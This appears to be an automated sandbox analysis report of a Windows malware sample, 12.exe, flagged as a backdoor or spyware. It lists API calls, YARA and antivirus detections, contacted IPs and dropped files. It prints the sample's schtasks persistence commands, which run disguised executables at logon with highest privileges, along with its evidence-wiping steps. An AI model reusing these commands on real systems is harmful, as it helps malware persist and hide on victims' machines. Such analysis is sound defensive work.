NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92ccc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92db1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92db9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dbb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 6952 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dbd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (4 events)

file	C:\FontWinintohostNet\8MzrE1G1pe.bat
file	C:\FontWinintohostNet\FontWinintohostNetrefperfsvc.exe
file	C:\FontWinintohostNet\UWE3BhTNVatEksTFn0CppPafAWK.vbe
file	C:\FontWinintohostNet\u8hVPpfkR4YIk505GPamOvaaPm.bat

Creates a suspicious process (6 events)

cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\tmpzdcjvb\bin\wininit.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\osk\cmd.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchIndexer.exe'" /rl HIGHEST /f
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\FontWinintohostNet\8MzrE1G1pe.bat"
cmdline	"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\all\Microsoft\Windows\Caches\csrss.exe'" /rl HIGHEST /f

Drops a binary and executes it (3 events)

file	C:\FontWinintohostNet\UWE3BhTNVatEksTFn0CppPafAWK.vbe
file	C:\FontWinintohostNet\FontWinintohostNetrefperfsvc.exe
file	C:\FontWinintohostNet\8MzrE1G1pe.bat

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 12, 2021, 6:22 p.m.	show_type: 0 filepath_r: C:/FontWinintohostNet/u8hVPpfkR4YIk505GPamOvaaPm.bat parameters: filepath: C:/FontWinintohostNet/u8hVPpfkR4YIk505GPamOvaaPm.bat	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 5960 thread_handle: 0x0000000000000354 process_identifier: 4220 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\WmiPrvSE.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000035c	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 7444 thread_handle: 0x0000000000000354 process_identifier: 1812 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\tmpzdcjvb\bin\wininit.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000360	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 4964 thread_handle: 0x0000000000000374 process_identifier: 8408 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\osk\cmd.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000378	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 4012 thread_handle: 0x0000000000000374 process_identifier: 1036 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\all\Microsoft\Windows\Caches\csrss.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000037c	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 3320 thread_handle: 0x0000000000000374 process_identifier: 5860 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchIndexer.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000384	1	1
ShellExecuteExW June 12, 2021, 6:22 p.m.	show_type: 0 filepath_r: C:\FontWinintohostNet\8MzrE1G1pe.bat parameters: filepath: C:\FontWinintohostNet\8MzrE1G1pe.bat	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 12, 2021, 6:22 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 12, 2021, 6:22 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 12, 2021, 6:22 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (39 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (7 events)

cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\tmpzdcjvb\bin\wininit.exe'" /rl HIGHEST /f
cmdline	chcp 65001
cmdline	"schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\osk\cmd.exe'" /rl HIGHEST /f
cmdline	ping -n 5 localhost
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchIndexer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\all\Microsoft\Windows\Caches\csrss.exe'" /rl HIGHEST /f

Communicates with host for which no DNS query was performed (8 events)

host	104.21.80.171
host	162.0.210.44
host	162.0.220.187
host	172.217.25.14
host	198.13.62.186
host	82.146.43.69
host	192.243.59.20
host	213.174.155.130

Installs itself for autorun at Windows startup (5 events)

cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "wininit" /sc ONLOGON /tr "'C:\tmpzdcjvb\bin\wininit.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\osk\cmd.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchIndexer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\all\Microsoft\Windows\Caches\csrss.exe'" /rl HIGHEST /f

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	C:/FontWinintohostNet/u8hVPpfkR4YIk505GPamOvaaPm.bat
parent_process	wscript.exe				martian_process	"C:\FontWinintohostNet\u8hVPpfkR4YIk505GPamOvaaPm.bat"

Attempts to remove evidence of file being downloaded from the Internet (5 events)

file	C:\Windows\SysWOW64\osk\cmd.exe:Zone.Identifier
file	C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchIndexer.exe:Zone.Identifier
file	C:\Program Files (x86)\Common Files\Services\WmiPrvSE.exe:Zone.Identifier
file	C:\tmpzdcjvb\bin\wininit.exe:Zone.Identifier
file	C:\Sandbox\test22\DefaultBox\user\all\Microsoft\Windows\Caches\csrss.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 4656 resumed a thread in remote process 7948
Process injection	Process 4440 resumed a thread in remote process 3460
NtResumeThread June 12, 2021, 6:22 p.m.	thread_handle: 0x00000274 suspend_count: 1 process_identifier: 7948	1	0	0
NtResumeThread June 12, 2021, 6:22 p.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 3460	1	0	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

Generates some ICMP traffic

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

162.0.210.44:443

File has been identified by 32 AntiVirus engines on VirusTotal as malicious (32 events)

Elastic	malicious (high confidence)
DrWeb	BackDoor.QuasarNET.5
MicroWorld-eScan	Trojan.Uztuby.17
FireEye	Trojan.Uztuby.17
McAfee	GenericRXJH-DC!8A2AF8EF221C
Zillya	Trojan.ScriptKD.JS.10
Cybereason	malicious.857330
Arcabit	Trojan.Uztuby.17
BitDefenderTheta	Gen:NN.ZemsilF.34738.Rq0@a0C73ihi
Cyren	W32/MSIL_Kryptik.EEI.gen!Eldorado
ESET-NOD32	a variant of MSIL/Spy.Agent.CVT
APEX	Malicious
Avast	Win32:RATX-gen [Trj]
ClamAV	Win.Malware.Uztuby-9848412-0
Kaspersky	HEUR:Backdoor.MSIL.LightStone.gen
BitDefender	Trojan.Uztuby.17
Ad-Aware	Trojan.MSIL.Basic.8.Gen
Emsisoft	Trojan.Uztuby.17 (B)
VIPRE	Trojan.Win32.Generic!BT
McAfee-GW-Edition	BehavesLike.Win32.Generic.dh
Sophos	Mal/SpyNoon-A
SentinelOne	Static AI - Malicious SFX
eGambit	Unsafe.AI_Score_99%
MAX	malware (ai score=86)
Microsoft	Trojan:MSIL/SpyNoon.RTU!MTB
GData	Win32.Trojan.BSE.1CL7UZW
Cynet	Malicious (score: 100)
ALYac	Trojan.MSIL.Basic.8.Gen
Malwarebytes	Malware.AI.1519748889
Ikarus	Trojan.MSIL.Spy
Fortinet	MSIL/Agent.CVT!tr
AVG	Win32:RATX-gen [Trj]

12.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All